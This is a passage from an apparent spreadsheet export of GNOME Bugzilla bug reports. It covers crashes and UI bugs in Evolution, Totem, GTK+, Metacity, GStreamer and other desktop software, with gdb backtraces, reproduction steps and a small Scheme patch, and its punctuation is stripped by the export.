--------------------------------------------------------------------------
New Thread 1024 (LWP 8896)]
0x41176369 in __wait4 () at __wait4:-1
	in __wait4
#0  0x41176369 in __wait4 () at __wait4:-1
#1  0x411f27b0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4044f92e in waitpid (pid=9183 stat_loc=0xbfffe83c options=0)
    at wrapsyscall.c:172
#3  0x40c349c6 in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x4044d4f3 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43
__dsh = 49168 edi = 135194652 esi = 0 ebp = 3221220360 esp =
3221220320 ebx = 137310680 edx = 1074895876 ecx = 30 eax = 0 trapno =
14 err = 4 eip = 135090203 cs = 35 __csh = 0 eflags = 2163330
esp_at_signal = 3221220320 ss = 43 __ssh = 0 fpstate = 0xbfffe960
oldmask = 2147483648 cr2 = 0}) at signals.c:97
#5  
#6  dalarm_widgets_to_alarm (dialog=0xbfffec50 alarm=0x82f31b0)
    at alarm-options.c:482
#7  0x080d519e in dialog_to_alarm (dialog=0xbfffec50 alarm=0x82f31b0)
    at alarm-options.c:560
#8  0x080d52e0 in alarm_options_dialog_run (alarm=0x82f31b0)
    at alarm-options.c:615
#9  0x080d36c2 in button_options_clicked_cb (widget=0x82e0e00 data=0x82f3150)
    at alarm-page.c:814
#10 0x40e9a9f3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#11 0x40eca046 in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#12 0x40ec94a7 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#13 0x40ec751c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x40e38540 in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#15 0x40e39ab6 in gtk_button_get_relief () from /usr/lib/libgtk-1.2.so.0
#16 0x40e9a9f3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#17 0x40ec9353 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#18 0x40ec751c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#19 0x40e38484 in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#20 0x40e3942b in gtk_button_get_relief () from /usr/lib/libgtk-1.2.so.0
#21 0x40e9a7c9 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#22 0x40ec94e7 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#23 0x40ec751c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#24 0x40efe7fc in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#25 0x40e9a740 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#26 0x40e998fd in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#27 0x40f4d10f in gdk_wm_protocols_filter () from /usr/lib/libgdk-1.2.so.0
#28 0x40f7d055 in g_main_dispatch (dispatch_time=0xbffff8c0) at gmain.c:656
#29 0x40f7d659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#30 0x40f7d7e8 in g_main_run (loop=0x8142830) at gmain.c:935
#31 0x40e99203 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#32 0x4051c53b in bonobo_main () from /usr/lib/libbonobo.so.2
#33 0x080b4b07 in main (argc=3 argv=0xbffff9c4) at main.c:186
#34 0x410de336 in __libc_start_main (main=0x80b4a2c  argc=3 
    ubp_av=0xbffff9c4 init=0x8067c64  fini=0x80e7380  
    rtld_fini=0x4000d2fc  stack_end=0xbffff9bc)
    at ../sysdeps/generic/libc-start.c:129
Thread 1 (Thread 1024 (LWP 8896)):
#0  0x41176369 in __wait4 () at __wait4:-1
#1  0x411f27b0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4044f92e in waitpid (pid=9183 stat_loc=0xbfffe83c options=0)
    at wrapsyscall.c:172
#3  0x40c349c6 in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x4044d4f3 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43
__dsh = 49168 edi = 135194652 esi = 0 ebp = 3221220360 esp =
3221220320 ebx = 137310680 edx = 1074895876 ecx = 30 eax = 0 trapno =
14 err = 4 eip = 135090203 cs = 35 __csh = 0 eflags = 2163330
esp_at_signal = 3221220320 ss = 43 __ssh = 0 fpstate = 0xbfffe960
oldmask = 2147483648 cr2 = 0}) at signals.c:97
#5  
#6  dalarm_widgets_to_alarm (dialog=0xbfffec50 alarm=0x82f31b0)
    at alarm-options.c:482
#7  0x080d519e in dialog_to_alarm (dialog=0xbfffec50 alarm=0x82f31b0)
    at alarm-options.c:560
#8  0x080d52e0 in alarm_options_dialog_run (alarm=0x82f31b0)
    at alarm-options.c:615
#9  0x080d36c2 in button_options_clicked_cb (widget=0x82e0e00 data=0x82f3150)
    at alarm-page.c:814
#10 0x40e9a9f3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#11 0x40eca046 in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#12 0x40ec94a7 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#13 0x40ec751c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x40e38540 in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#15 0x40e39ab6 in gtk_button_get_relief () from /usr/lib/libgtk-1.2.so.0
#16 0x40e9a9f3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#17 0x40ec9353 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#18 0x40ec751c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#19 0x40e38484 in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#20 0x40e3942b in gtk_button_get_relief () from /usr/lib/libgtk-1.2.so.0
#21 0x40e9a7c9 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#22 0x40ec94e7 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#23 0x40ec751c in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#24 0x40efe7fc in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#25 0x40e9a740 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#26 0x40e998fd in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#27 0x40f4d10f in gdk_wm_protocols_filter () from /usr/lib/libgdk-1.2.so.0
#28 0x40f7d055 in g_main_dispatch (dispatch_time=0xbffff8c0) at gmain.c:656
#29 0x40f7d659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#30 0x40f7d7e8 in g_main_run (loop=0x8142830) at gmain.c:935
#31 0x40e99203 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#32 0x4051c53b in bonobo_main () from /usr/lib/libbonobo.so.2
#33 0x080b4b07 in main (argc=3 argv=0xbffff9c4) at main.c:186
#34 0x410de336 in __libc_start_main (main=0x80b4a2c  argc=3 
    ubp_av=0xbffff9c4 init=0x8067c64  fini=0x80e7380  
    rtld_fini=0x4000d2fc  stack_end=0xbffff9bc)
    at ../sysdeps/generic/libc-start.c:129
0x41176369
-1
in __wait4
#0  0x41176369 in __wait4 () at __wait4:-1
-1
in __wait4
No locals.
#1  0x411f27b0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4044f92e in waitpid (pid=9183 stat_loc=0xbfffe83c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffe83c
options = 0
result = 0
oldtype = 0
#3  0x40c349c6 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x4044d4f3 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43
__dsh = 49168 edi = 135194652 esi = 0 ebp = 3221220360 esp =
3221220320 ebx = 137310680 edx = 1074895876 ecx = 30 eax = 0 trapno =
14 err = 4 eip = 135090203 cs = 35 __csh = 0 eflags = 2163330
esp_at_signal = 3221220320 ss = 43 __ssh = 0 fpstate = 0xbfffe960
oldmask = 2147483648 cr2 = 0}) at signals.c:97
	in signals.c
self = 0x404564a0
in_sighandler = 0x0
self = 0x404564a0
in_sighandler = 0x0
#5  
No locals.
#6  dalarm_widgets_to_alarm (dialog=0xbfffec50 alarm=0x82f31b0)
    at alarm-options.c:482
	in alarm-options.c
x_name = 0x0
dialog = (Dialog *) 0xfffffe00
alarm = (CalComponentAlarm *) 0x0
str = 0x82f31d8 comp
description = {
  value = 0x8379600 Â°\f\037AÂ°\f\037A=CLC_NUMERIC=en_USLC_TIME=en_U0 
  altrep = 0x0}
icalcomp = (icalcomponent *) 0x82f31d8
icalprop = (icalproperty *) 0x0
#7  0x080d519e in dialog_to_alarm (dialog=0xbfffec50 alarm=0x82f31b0)
    at alarm-options.c:560
560
in alarm-options.c
dialog = (Dialog *) 0xbfffec50
alarm = (CalComponentAlarm *) 0x82f31b0
action = CAL_ALARM_DISPLAY</t>
  </si>
  <si>
    <t>EVINCE-332993</t>
  </si>
  <si>
    <t>Viewing presentations with dual mode enabled skips each even page</t>
  </si>
  <si>
    <t>When viewing a presentation with dual mode enabled each even page is skipped (leading to an awfull presentation).
Reproducing is easy: open a PDF file view it in dual mode. Then press F5 to view it as a presentation. Observe how it shows the first third ... page.
This happens with evince 0.5.0 haven't tested 0.5.1 but the release announcement didn't mention anything that could relate to this.</t>
  </si>
  <si>
    <t>TOTEM-340014</t>
  </si>
  <si>
    <t>The last un-maximized window size isn't saved</t>
  </si>
  <si>
    <t>Please describe the problem:
If you open Totem maximize it and close it the next time you open it you
won't be able to un-maximize it. The window will just be - say - 1024x768 but be
moveable.
The correct way to handle it is to save the size of the last non-maximized
window and restore it on un-maximize.
Evolution used to have the same problem and they fixed it very recently so it
might be easier for you to understand what I mean by reading Evolution's bug
#243962.
Steps to reproduce:
1. Open Totem
2. Maximize its window
3. Close Totem
4. Open Totem again
5. Click on the un-maximize icon in Metacity
Actual results:
The window moves a little bit but stays at the same size it was before.
Expected results:
The window size should be restored to the latest non-maximized size.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>GTK+-557315</t>
  </si>
  <si>
    <t>stale clipboard target cache</t>
  </si>
  <si>
    <t>Please describe the problem:
The gtk clipboard caches the targets and only renews the cache when the owner changes. The cache should also be renewed when gtk_clipboard_set_contents is called.
Steps to reproduce:
On the default clipboard (GDK_SELECTION_CLIPBOARD)
1. Call gtk_clipboard_set_with_data
2. Call it again (different target list)
3. Examine available targets with gtk_clipboard_wait_for_targets
Actual results:
The target list that is returned is the target list set during the first call to set_with_data.
Expected results:
The target list that is returned is the target list set during the second call to set_with_data.
Does this happen every time?
Yes.
Other information:
If you manually examine the contents of the TARGETS target (via gtk_clipboard_wait_for_contents followed by gtk_selection_data_get_targets) then the correct targets are returned. Only the targets cache in the _GtkClipboard struct is wrong.</t>
  </si>
  <si>
    <t>estade</t>
  </si>
  <si>
    <t>GNOME-PRINT-122639</t>
  </si>
  <si>
    <t>Print to postscript or pdf file fails with Gnumeric 1.1.20</t>
  </si>
  <si>
    <t>gnome-print 1:0.37-0.ximian.4.6
        I can not print to a file with Gnumeric (Ximian version 1.1.20 on a
Red Hat 7.3 system). When I click on the printer icon I get a window with a
choice of printers plus options to create a postscript or a pdf file. If I
select the postscript or pdf options and hit the print button the print
window disappears but no output is produced. If I select a printer I do
get the proper output from that printer. I asked the Gnumeric list if this
was a Gnumeric or CUPS problem. The response I got was that it was probably
a gnome-print problem.</t>
  </si>
  <si>
    <t>schrenk</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-405150</t>
  </si>
  <si>
    <t>translatable_game_names.h needs to be updated</t>
  </si>
  <si>
    <t>It still contains the Spider variants Spider One/Two Suit which were made into Spider options instead. Running the get_titles.pl script will do it.</t>
  </si>
  <si>
    <t>GTK+-96390</t>
  </si>
  <si>
    <t>The link to GtkStatusbar at GTK+ Object Hierarchy page is wrong</t>
  </si>
  <si>
    <t>Actually there is not link to GtkStatusbar at ch01.html of Gtk+ Reference
Manual. 
Probably this is because the text which should be the link is
GtkStatusBar but the actual widget name is GtkStatusbar.</t>
  </si>
  <si>
    <t>EVOLUTION-209899</t>
  </si>
  <si>
    <t>Evo depends on unreleased gnome-i18n tools- specific breakage results</t>
  </si>
  <si>
    <t>Testing with evolution-0.13.99-snap.ximian.200109120708 and using Swedish
(sv_SE).
The folder names Outbox and Trash in the folder tree view are not shown
translated in contrast to Inbox Calendar Drafts Sent and Tasks.</t>
  </si>
  <si>
    <t>GSTREAMER-523993</t>
  </si>
  <si>
    <t>playbin2 blocks after a while when listening to a radio stream</t>
  </si>
  <si>
    <t>After listening to a internet radio stream for a while playbin2 blocks. Looking into it with gdb revealed the following (only the relevant parts pasted):
Thread 4 (Thread 0x41001950 (LWP 27199)):
#0  0x00002b51aae3ed29 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#1  0x00002b51ae9a35a8 in gst_queue_chain (pad= buffer=0x9261b0) at gstqueue2.c:1339
        started = 1
        queue = (GstQueue *) 0x76a020
        __PRETTY_FUNCTION__ = gst_queue_chain
Thread 5 (Thread 0x40800950 (LWP 27198)):
#0  0x00002b51aae3ed29 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#1  0x00002b51ae9a1d4a in gst_queue_loop (pad=) at gstqueue2.c:1509
        started = 1
        queue = (GstQueue *) 0x76a020
        ret = 
        __PRETTY_FUNCTION__ = gst_queue_loop
Looking into the gstqueue2 at the relevant lines showed that the waits are respectively for removing/adding a queue.. So it's both waiting for an item to be removed and to be added.. Using gdb to doublecheck:
(gdb) p ((GstQueue*) 0x76a020)-&gt;waiting_add
$48 = 1
(gdb) p ((GstQueue*) 0x76a020)-&gt;waiting_del
$49 = 1
Woopsie.. So let's see if it's actually empty:
(gdb) p ((GstQueue*) 0x76a020)-&gt;queue-&gt;length
$50 = 0
Apparently it is. So now let's see why it thinks it's full:
(gdb) p ((GstQueue*) 0x76a020)-&gt;max_level.buffers
$65 = 100
(gdb) p ((GstQueue*) 0x76a020)-&gt;cur_level.buffers
$66 = 0
(gdb) p ((GstQueue*) 0x76a020)-&gt;max_level.bytes
$67 = 2097152
(gdb) p ((GstQueue*) 0x76a020)-&gt;cur_level.bytes
$68 = 0
(gdb) p ((GstQueue*) 0x76a020)-&gt;max_level.time
$69 = 2000000000
(gdb) p ((GstQueue*) 0x76a020)-&gt;cur_level.time
$70 = 0
(gdb) p ((GstQueue*) 0x76a020)-&gt;use_rate_estimate 
$71 = 1
(gdb) p ((GstQueue*) 0x76a020)-&gt;max_level.rate_time
$72 = 2000000000
(gdb) p ((GstQueue*) 0x76a020)-&gt;cur_level.rate_time
$73 = 2015175107</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-90103</t>
  </si>
  <si>
    <t>aisleriot: agnes shows incollect hint message.</t>
  </si>
  <si>
    <t>http://bugs.debian.org/154945
Hello
here a reported bug with a patch:
Agnes game of AisleRiot rarely shows incollect hints.
When I click the Hint button on the following state:
 ??          3S  4C  --  --
 JD  AS  ??  ??  ??  ??  ??
10D  8D  8C  ??  ??  ??  ??
 QS      7C  ??  ??  ??  ??
 JC          9H  4S  ??  ??
             8H  AH  ??  ??
             4D  KD  4H  ??
             3D  QD  JD  JC
             5H  QC 10D 10C
                         9S
                         8S
                         7D
                         6S
information panel will be opened and show the message such as Move
the jack of spades on the queen of clubs.
But this operation is not permitted because the right most slot not
consists entirely of black cards.
This problem will happen when the cards on the top and bottom of the
sequence has same color and it contains another color cards.
This problem may be fixed by the following patch:
$ diff -c gnome-games-1.4.0.4/aisleriot/agnes.scm /tmp/agnes.scm
*** gnome-games-1.4.0.4/aisleriot/agnes.scm     Thu Jul 19 14:55:35 2001
--- /tmp/agnes.scm      Wed Jul 31 17:42:47 2002
***************
*** 223230 ****
    (cond ((&lt; (length card-list) 2)
         (car card-list))
        ((or (not (is-visible? (car (reverse card-list))))
!            (eq? (is-red? (car (reverse card-list)))
!                 (is-black? (car card-list)))
             (not (check-straight-descending-list card-list)))
         (strip (reverse (cdr (reverse card-list)))))
        (#t (car (reverse card-list)))))
--- 223231 ----
    (cond ((&lt; (length card-list) 2)
         (car card-list))
        ((or (not (is-visible? (car (reverse card-list))))
!           (eq? (is-red? (car (reverse card-list)))
!                (is-black? (car card-list)))
!            (not (check-same-color(card-list)))
             (not (check-straight-descending-list card-list)))
         (strip (reverse (cdr (reverse card-list)))))
        (#t (car (reverse card-list)))))
--
kyamada@psg.cs.titech.ac.jp
thx</t>
  </si>
  <si>
    <t>TOTEM-125791</t>
  </si>
  <si>
    <t>The totem gui does not give control of my mouse back</t>
  </si>
  <si>
    <t>tested with totem 0.99.7
Steps to reproduce:
1.  Get totem playing something.
2.  Fullscreen it.
3.  Press the mouse button on the volume slider to drag it.
4.  Keep holding the mouse button down for a while until the gui disapears.
5.  The mouse is now stuck on the slider.</t>
  </si>
  <si>
    <t>bloodpup</t>
  </si>
  <si>
    <t>EVOLUTION-491787</t>
  </si>
  <si>
    <t>No visibility of marked text block with empty lines in composer</t>
  </si>
  <si>
    <t>Zaznaczony blok tekstu jest caÅ‚kowicie niewidoczny kiedy zawiera tylko wiersze puste i puste cytowane.
Distribution: Ubuntu 7.04 (feisty)
Gnome Release: 2.18.1 2007-04-11 (Ubuntu)
BugBuddy Version: 2.18.1</t>
  </si>
  <si>
    <t>NAUTILUS-42210</t>
  </si>
  <si>
    <t>GNOME is referred to as Gnome in the about dialog</t>
  </si>
  <si>
    <t xml:space="preserve">GNOME is referred to as Gnome in the about dialog.  GNOME is an acronym.  This
is not right.
------- Additional Comments From eli@eazel.com 2000-10-16 19:46:35 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:37 -------
The original reporter (linuxfan@ionet.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>EVOLUTION-257508</t>
  </si>
  <si>
    <t>Junk icon isn't seen in locale ko_KR.UTF-8.</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Steps to reproduce the problem:
1. Excute evolution in locale ko_KR.UTF-8.
2. Junk icon isn't seen but user can see Junk icon in en_US.UTF-8.
3. 
Actual Results:
Expected Results:
How often does this happen? 
Additional Information:</t>
  </si>
  <si>
    <t>GTK+-317332</t>
  </si>
  <si>
    <t>Handle grab_notify in GtkPaned</t>
  </si>
  <si>
    <t>Please describe the problem:
Hi
I have one window with a hpaned.
Timeout shows me another window modal dialog.
Interface locks a bit when I drag hpaned handle
and then time outs.
Steps to reproduce:
1. create hpaned
2. create modal dialog with GTK_WIN_POS_MOUSE
3. show the dialog when dragging hpaned handle
Actual results:
Can not click dialog buttons.
Can not drag handle.
(however I can close that dialog if it is closable)
Expected results:
Can click dialog buttons.
Does this happen every time?
Yes
Other information:
Gtk 2.6.7
Win98 german
some glade output:
GtkWidget*
create_dialog1 (void)
{
  GtkWidget *dialog1
  GtkWidget *dialog_vbox1
  GtkWidget *label3
  GtkWidget *dialog_action_area1
  GtkWidget *cancelbutton1
  GtkWidget *okbutton1
  dialog1 = gtk_dialog_new ()
  gtk_window_set_title (GTK_WINDOW (dialog1) _(dialog1))
  gtk_window_set_position (GTK_WINDOW (dialog1) GTK_WIN_POS_MOUSE)
  gtk_window_set_modal (GTK_WINDOW (dialog1) TRUE)
  gtk_window_set_type_hint (GTK_WINDOW (dialog1) GDK_WINDOW_TYPE_HINT_DIALOG)
  dialog_vbox1 = GTK_DIALOG (dialog1)-&gt;vbox
  gtk_widget_show (dialog_vbox1)
  label3 = gtk_label_new (_(label3))
  gtk_widget_show (label3)
  gtk_box_pack_start (GTK_BOX (dialog_vbox1) label3 FALSE FALSE 0)
  dialog_action_area1 = GTK_DIALOG (dialog1)-&gt;action_area
  gtk_widget_show (dialog_action_area1)
  gtk_button_box_set_layout (GTK_BUTTON_BOX (dialog_action_area1) 
GTK_BUTTONBOX_END)
  cancelbutton1 = gtk_button_new_from_stock (gtk-cancel)
  gtk_widget_show (cancelbutton1)
  gtk_dialog_add_action_widget (GTK_DIALOG (dialog1) cancelbutton1 
GTK_RESPONSE_CANCEL)
  GTK_WIDGET_SET_FLAGS (cancelbutton1 GTK_CAN_DEFAULT)
  okbutton1 = gtk_button_new_from_stock (gtk-ok)
  gtk_widget_show (okbutton1)
  gtk_dialog_add_action_widget (GTK_DIALOG (dialog1) okbutton1 
GTK_RESPONSE_OK)
  GTK_WIDGET_SET_FLAGS (okbutton1 GTK_CAN_DEFAULT)
  /* Store pointers to all widgets for use by lookup_widget(). */
  GLADE_HOOKUP_OBJECT_NO_REF (dialog1 dialog1 dialog1)
  GLADE_HOOKUP_OBJECT_NO_REF (dialog1 dialog_vbox1 dialog_vbox1)
  GLADE_HOOKUP_OBJECT (dialog1 label3 label3)
  GLADE_HOOKUP_OBJECT_NO_REF (dialog1 
dialog_action_area1 dialog_action_area1)
  GLADE_HOOKUP_OBJECT (dialog1 cancelbutton1 cancelbutton1)
  GLADE_HOOKUP_OBJECT (dialog1 okbutton1 okbutton1)
  return dialog1
}
GtkWidget*
create_window1 (void)
{
  GtkWidget *window1
  GtkWidget *hpaned1
  GtkWidget *label1
  GtkWidget *label2
  window1 = gtk_window_new (GTK_WINDOW_TOPLEVEL)
  gtk_window_set_title (GTK_WINDOW (window1) _(window1))
  hpaned1 = gtk_hpaned_new ()
  gtk_widget_show (hpaned1)
  gtk_container_add (GTK_CONTAINER (window1) hpaned1)
  gtk_paned_set_position (GTK_PANED (hpaned1) 0)
  label1 = gtk_label_new (_(label1))
  gtk_widget_show (label1)
  gtk_paned_pack1 (GTK_PANED (hpaned1) label1 TRUE FALSE)
  label2 = gtk_label_new (_(label2))
  gtk_widget_show (label2)
  gtk_paned_pack2 (GTK_PANED (hpaned1) label2 TRUE FALSE)
  /* Store pointers to all widgets for use by lookup_widget(). */
  GLADE_HOOKUP_OBJECT_NO_REF (window1 window1 window1)
  GLADE_HOOKUP_OBJECT (window1 hpaned1 hpaned1)
  GLADE_HOOKUP_OBJECT (window1 label1 label1)
  GLADE_HOOKUP_OBJECT (window1 label2 label2)
  return window1
}</t>
  </si>
  <si>
    <t>mw158979</t>
  </si>
  <si>
    <t>METACITY-360274</t>
  </si>
  <si>
    <t>pango markup warning on Alt-Tab popup</t>
  </si>
  <si>
    <t>This seems a lot like bug 324846 but that's supposed to be fixed for a long time while I'm seeing this problem with HEAD / 2.16.2.
This message is showing up sometimes in my ~/.xsession-errors:
Avertissement du gestionnaire de fenÃªtres : Log level 16: Failed to set text from markup due to error parsing markup: Erreur Ã  la ligne 1 caractÃ¨re 102 : L'Ã©lÃ©ment Â« markup Â» a Ã©tÃ© fermÃ© mais l'Ã©lÃ©ment actuellement ouvert est Â« b Â»
and I've finally got a trace from it. The window title that's causing the problem is the title of a window whose button was flashing in the wnck applet.
Breakpoint 1 log_handler (log_domain=0xb7ed4f01 Gtk log_level=G_LOG_LEVEL_WARNING 
    message=0x830f408 Failed to set text from markup due to error parsing markup: Erreur Ã  la ligne 1 caractÃ¨re 102 : L'Ã©lÃ©ment Â« markup Â» a Ã©tÃ© fermÃ© mais l'Ã©lÃ©ment actuellement ouvert est Â« b Â» user_data=0x0) at main.c:60
60        meta_warning (Log level %d: %s\n log_level message)
#0  log_handler (log_domain=0xb7ed4f01 Gtk log_level=G_LOG_LEVEL_WARNING 
    message=0x830f408 Failed to set text from markup due to error parsing markup: Erreur Ã  la ligne 1 caractÃ¨re 102 : L'Ã©lÃ©ment Â« markup Â» a Ã©tÃ© fermÃ© mais l'Ã©lÃ©ment actuellement ouvert est Â« b Â» user_data=0x0) at main.c:60
#1  0xb7938beb in g_logv (log_domain= log_level=G_LOG_LEVEL_WARNING 
    format=0xb7edc0e8 Failed to set text from markup due to error parsing markup: %s args1=0xbfa6166c ï¿½ï¿½0\bï¿½\026ï¿½ï¿½) at gmessages.c:474
#2  0xb7938de5 in g_log (log_domain=0xb7ed4f01 Gtk log_level=G_LOG_LEVEL_WARNING 
    format=0xb7edc0e8 Failed to set text from markup due to error parsing markup: %s) at gmessages.c:517
#3  0xb7d47972 in gtk_label_recalculate (label=0x823cf60) at gtklabel.c:1307
#4  0xb7d4818c in gtk_label_set_markup (label=0x823cf60 
    str=0x830bf68 file:///some/path/some.file.ext - SomeApp) at gtklabel.c:1359
#5  0x0807ddbb in meta_ui_tab_popup_new (entries=0x82e6a20 screen_number=0 entry_count=2 width=5 outline=1) at tabpopup.c:360
#6  0x080762ac in meta_screen_ensure_tab_popup (screen=0x8100cf0 list_type=META_TAB_LIST_NORMAL show_type=META_TAB_SHOW_ICON) at screen.c:1303
#7  0x0805afa7 in meta_display_begin_grab_op (display=0x80f7278 screen=0x8100cf0 window=0x0 op=META_GRAB_OP_KEYBOARD_TABBING_NORMAL 
    pointer_already_grabbed=0 event_serial=360036 button=0 modmask=8 timestamp=527244528 root_x=0 root_y=0) at display.c:3498
#8  0x0806ab7a in do_choose_window (display=0x80f7278 screen=0x8100cf0 event_window= event=0xbfa61cb8 binding=0x80f9df0 backward=0 
    show_popup=1) at keybindings.c:3118
#9  0x0806b5c3 in meta_display_process_key_event (display=0x80f7278 window=0x0 event=0xbfa61cb8) at keybindings.c:1642
#10 0x0805ce85 in event_callback (event=0xbfa61cb8 data=0x80f7278) at display.c:1616
#11 0x08092300 in filter_func (xevent=0xbfa61cb8 event=0x80f04a0 data=0x80fe288) at ui.c:87
#12 0xb7bc01d1 in gdk_event_apply_filters (xevent=0xbfa61cb8 event=0x80f04a0 filters=0x10) at gdkevents-x11.c:346
#13 0xb7bc1d1f in gdk_event_translate (display=0x80ec098 event=0x80f04a0 xevent=0xbfa61cb8 return_exposes=0) at gdkevents-x11.c:895
#14 0xb7bc438c in _gdk_events_queue (display=0x80ec098) at gdkevents-x11.c:2255
#15 0xb7bc48af in gdk_event_dispatch (source=0x80f3698 callback=0 user_data=0x0) at gdkevents-x11.c:2315
#16 0xb79300f2 in g_main_context_dispatch (context=0x80c1300) at gmain.c:2049
#17 0xb793324f in g_main_context_iterate (context=0x80c1300 block=1 dispatch=1 self=0x80c3548) at gmain.c:2681
#18 0xb79335f9 in g_main_loop_run (loop=0x80c13b0) at gmain.c:2885
#19 0x0806e0fa in main (argc=1 argv=0xbfa62224) at main.c:391</t>
  </si>
  <si>
    <t>GTK+-81543</t>
  </si>
  <si>
    <t>metacity crash when drag a String from qt apps.</t>
  </si>
  <si>
    <t>metacity crash when drag a String from qt apps to out of window. (I was
tested with kwrite(kde3) and aviplay(qt2))
dragging other object (directory file) are fine.</t>
  </si>
  <si>
    <t>GLIB-54040</t>
  </si>
  <si>
    <t>of by one error in g_utf8_to_ucs4_fast</t>
  </si>
  <si>
    <t>While debugging my program with electric-fence I found
this bug:
it looks like g_utf8_to_ucs4_fast accesses memory one byte to far.
I'll attach a testcase and a patch asap.
What do you think?
/ Jonas BorgstrÃ¶m (jborg on gimpnet)
btw it is the latest CVS version.</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-474627</t>
  </si>
  <si>
    <t>crash in Deskbar: upgrade from feisty to g...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
upgrade from feisty to gusty tribe 5
Distribution: Ubuntu 7.10 (gutsy)
Gnome Release: 2.19.92 2007-09-04 (Ubuntu)
BugBuddy Version: 2.18.1
System: Linux 2.6.20-16-generic #2 SMP Fri Aug 31 00:55:27 UTC 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 70200000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Human
Icon Theme: Human
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
----------- .xsession-errors (6418 sec old) ---------------------
==========================================================================
Forced audio codec: mad
Opening audio decoder: [libmad] libmad mpeg audio decoder
AUDIO: 48000 Hz 2 ch s16le 128.0 kbit/8.33% (ratio: 16000-&gt;192000)
Selected audio codec: [mad] afm: libmad (libMAD MPEG layer 1-2-3)
==========================================================================
AO: [alsa] 48000Hz 2ch s16le (2 bytes per sample)
Starting playback...
VDec: vo config request - 640 x 272 (preferred colorspace: Planar YV12)
[PP] Using external postprocessing filter max q = 6.
VDec: using Planar YV12 as output csp (no 0)
Movie-Aspect is 2.35:1 - prescaling to correct movie aspect.
VO: [xv] 640x272 =&gt; 640x272 Planar YV12  [zoom]
A:   1.0 V:   0.0 A-V:  1.015 ct:  0.000   1/  1 ??% ??% ???% 0 6              
A:   1.1 V:   0.0 A-V:  1.080 ct:  0.004   2/  2 ??% ??% ???% 1 5              
A:   1.1 V:   0.1 A-V:  1.039 ct:  0.0
...Too much output ignoring rest...
--------------------------------------------------
Traceback (most recent call last):
  File /usr/lib/deskbar-applet/deskbar-applet line 27 in applet_factory
    dapplet = DeskbarApplet(applet)
  File /usr/lib/python2.5/site-packages/deskbar/ui/DeskbarApplet.py line 91 in __init__
    self.__setup_mvc()
  File /usr/lib/python2.5/site-packages/deskbar/ui/DeskbarApplet.py line 96 in __setup_mvc
    self.__core.run()
  File /usr/lib/python2.5/site-packages/deskbar/core/CoreImpl.py line 47 in run
    self._setup_keybinder()
